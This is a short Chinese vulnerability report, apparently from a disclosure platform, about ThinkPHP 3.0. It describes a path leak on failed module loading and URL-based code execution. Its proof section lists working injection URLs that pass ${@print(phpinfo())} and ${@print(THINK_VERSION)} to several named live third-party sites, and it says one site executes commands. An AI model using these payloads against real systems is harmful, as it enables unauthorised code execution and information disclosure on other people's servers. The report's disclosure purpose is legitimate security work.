### 简要描述:
延续thinkphp之前的url任意代码执行漏洞原理进行学习时发现thinkphp 3.0 出现模块加载失败,会爆应用程序路径! 求邀请码,求带领~~~
### 详细说明:
1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。
### 漏洞证明:
检测有两种情况
1. 可执行命令,这个估计是伪3.0版本?
交大定票
此站到可以执行命令
http://piao.eeyes.net/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
可查看版本
http://piao.eeyes.net/index.php/module/action/param1/$%7B@print(phpinfo())%7D
可查看phpinfo信息
2. 不可执行命令,爆路径
http://junmeicorp.com/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7D
[<img src="https://images.seebug.org/upload/201208/080057380e9d85c8bd53f6f1c2615f1611e59bf0.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/080057380e9d85c8bd53f6f1c2615f1611e59bf0.jpg)
http://www.bjvivi.com/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
[<img src="https://images.seebug.org/upload/201208/08005551074d13a52fd9008b93bf8f846ee18ce6.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/08005551074d13a52fd9008b93bf8f846ee18ce6.jpg)
http://www.yuetaojie.com/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D
[<img src="https://images.seebug.org/upload/201208/080056522947896b5a3bae54e40e982129af3071.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/080056522947896b5a3bae54e40e982129af3071.jpg)
暂无评论